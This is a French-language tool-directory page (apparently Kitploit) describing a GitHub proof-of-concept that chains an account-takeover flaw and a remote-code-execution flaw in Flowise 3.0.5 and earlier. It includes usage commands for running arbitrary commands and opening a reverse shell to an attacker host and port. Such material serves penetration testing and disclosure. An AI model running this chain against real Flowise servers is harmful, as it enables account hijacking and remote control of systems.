Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-58434-59528 — PoC de chaînage CVE-2025-58434 et CVE-2025-59528 | Kitploit
Outils/GitHubGitHub/azureadtrent/cve-2025-58434-59528
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationOutil d'Accès à Distance
GitHubazureadtrent/cve-2025-58434-59528

CVE-2025-58434-59528

PoC de chaînage CVE-2025-58434 et CVE-2025-59528

Voir le dépôt
43il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-58434 + CVE-2025-59528

Chaîne d'exploitation pour deux vulnérabilités affectant Flowise <= 3.0.5.


Vulnérabilités

CVE-2025-58434 — Prise de contrôle de compte non authentifiée

Le point d'accès « mot de passe oublié » renvoie un jeton de réinitialisation de mot de passe valide dans la réponse API sans nécessiter d'authentification. Un attaquant connaissant une adresse e-mail valide peut réinitialiser le mot de passe de n'importe quel compte sans interaction de l'utilisateur.

CVE-2025-59528 — Exécution de code à distance authentifiée

Le nœud CustomMCP transmet les entrées contrôlées par l'utilisateur directement à un constructeur Function() avec les privilèges complets de Node.js. Un utilisateur authentifié disposant d'une clé API valide peut exécuter des commandes OS arbitraires en tant qu'utilisateur du processus Flowise.

Corrigé dans : Flowise 3.0.6


Prérequis

  • Python 3.8+
pip install requests

Utilisation

Chaîne ATO complète (réinitialise le mot de passe, demande la clé API, lance un reverse shell) :

root@kitploit:~
python3 flowise_chain.py -t http://target -e [email protected]

RCE uniquement (si vous avez déjà une clé API) :

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"

Reverse shell avec une clé existante :

root@kitploit:~
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444

Options

OptionDescription
-t, --targetURL cible
-e, --emailEmail du compte cible (déclenche la chaîne ATO)
--api-keyFournir directement la clé API (ignore ATO)
-c, --commandCommande à exécuter
--lhostIP de l'attaquant pour le reverse shell
--lportPort de l'attaquant pour le reverse shell (par défaut : 4444)
--new-passwordMot de passe à définir lors de la réinitialisation (par défaut : Pwn3d!2026)
-k, --insecureIgnorer la vérification TLS

Remarques

En raison d'une particularité de Flowise 3.0.5, le point d'accès API de réinitialisation du mot de passe ne met pas immédiatement à jour les informations d'identification acceptées par le point d'accès de connexion. Le script effectue une pause après la réinitialisation et vous invite à vous connecter manuellement à l'interface utilisateur et à copier la clé API depuis /apikey.

Télécharger l’outil